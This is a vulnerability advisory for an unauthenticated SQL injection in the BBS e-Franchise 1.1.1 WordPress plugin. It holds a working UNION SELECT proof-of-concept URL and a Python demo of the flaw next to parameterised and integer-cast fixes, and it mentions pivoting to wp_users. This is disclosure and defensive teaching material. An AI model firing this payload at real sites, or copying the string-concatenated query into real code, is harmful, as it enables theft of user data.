BBS e-Franchise 1.1.1 - Unauthenticated SQL Injection


Description
The value of $_GET['uid'] is used in a database query without being escaped or cast, and the page that passes it to the plugin is reachable by any visitor, so no authentication is needed to exploit it.

To reproduce it, you will need to find a post or page that renders the plugin's shortcode; the injected uid parameter is then appended to that page's URL.
Proof of Concept
http://www.example.com/2016/09/26/ola-mundo-2/?uid=0+UNION+SELECT+1,2,3,4,name,6,7,8,9,10,11,12,13,14,15,slug,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FROM+wp_terms+WHERE+term_id=1
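The proof-of-concept URL reveals two things about the vulnerable query: it returns exactly 32 columns (a UNION must match the column count of the original SELECT), and the 5th and 16th columns are echoed into the page, which is why name and slug from wp_terms are placed there. The following is an added example, not code from the plugin or from the advisory author, that reproduces this mechanism against an in-memory SQLite database and shows the fix. The table name franchise, its column names c1..c32, and the SELECT shape are assumptions; only wp_terms mirrors the real WordPress schema. The real plugin is PHP, where the equivalent fix is $wpdb->prepare() with a %d placeholder or absint() on the parameter.

```python
import sqlite3

# Assumption: the plugin's query selects 32 columns and filters on the uid.
# The real column names are unknown; c1..c32 are placeholders.
NUM_COLS = 32

# The exact payload from the proof of concept, URL-decoded ('+' -> space).
PAYLOAD = (
    "0 UNION SELECT 1,2,3,4,name,6,7,8,9,10,11,12,13,14,15,slug,17,18,19,20,"
    "21,22,23,24,25,26,27,28,29,30,31,32 FROM wp_terms WHERE term_id=1"
)


def make_db():
    """Build a constructed in-memory database standing in for WordPress."""
    conn = sqlite3.connect(":memory:")
    extra = ", ".join(f"c{i} TEXT" for i in range(2, NUM_COLS + 1))
    conn.execute(f"CREATE TABLE franchise (c1 INTEGER PRIMARY KEY, {extra})")
    # One legitimate row so the normal lookup path can be shown (constructed).
    conn.execute("INSERT INTO franchise (c1, c2) VALUES (7, 'franchise seven')")
    # wp_terms uses the real WordPress column names the PoC relies on.
    conn.execute(
        "CREATE TABLE wp_terms (term_id INTEGER PRIMARY KEY, name TEXT, "
        "slug TEXT, term_group INTEGER)"
    )
    conn.execute("INSERT INTO wp_terms VALUES (1, 'Uncategorized', 'uncategorized', 0)")
    conn.commit()
    return conn


def vulnerable_lookup(conn, uid):
    """Mirrors the flaw: the raw uid is concatenated into the SQL string."""
    sql = f"SELECT * FROM franchise WHERE c1 = {uid}"
    return conn.execute(sql).fetchone()


def parameterised_lookup(conn, uid):
    """Fix 1: bind uid as data; the driver never treats it as SQL."""
    return conn.execute("SELECT * FROM franchise WHERE c1 = ?", (uid,)).fetchone()


def validated_lookup(conn, uid):
    """Fix 2 (defence in depth): cast to int before binding, rejecting junk.
    In WordPress this is the role of absint($_GET['uid'])."""
    try:
        uid_int = int(uid)
    except (TypeError, ValueError):
        return None
    return parameterised_lookup(conn, uid_int)


def demo():
    """Return what each variant yields for a normal id and for the PoC payload."""
    conn = make_db()
    attacked = vulnerable_lookup(conn, PAYLOAD)
    return {
        "normal": vulnerable_lookup(conn, "7")[1],
        # Columns 5 and 16 (0-based 4 and 15) carry the UNIONed wp_terms data.
        "leaked_name": attacked[4],
        "leaked_slug": attacked[15],
        "parameterised": parameterised_lookup(conn, PAYLOAD),
        "validated": validated_lookup(conn, PAYLOAD),
        "validated_normal": validated_lookup(conn, "7")[1],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The vulnerable path returns the wp_terms row because the attacker-controlled UNION SELECT has the same column count as the original query, and the columns the theme prints happen to be the 5th and 16th. Against a real MySQL backend the same payload would walk the rest of the schema (wp_users is the usual next target) simply by changing the FROM clause. Both fixed variants return nothing for the payload: with a bound parameter the string is compared as a value and can never equal an integer id, and the int() cast rejects it outright.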

Affects Plugin

References

EXPLOITDB 40782
URL http://lenonleite.com.br/blog/2016/11/18/bbs-e-franchise-1-1-1-plugin-of-wordpress-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br
Submitter Twitter lenonleite
Views 144
Verified No
WPVDB ID 8685

Timeline

Publicly Published 2016-11-12
Added 2016-12-06
Last Updated 2016-12-06

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.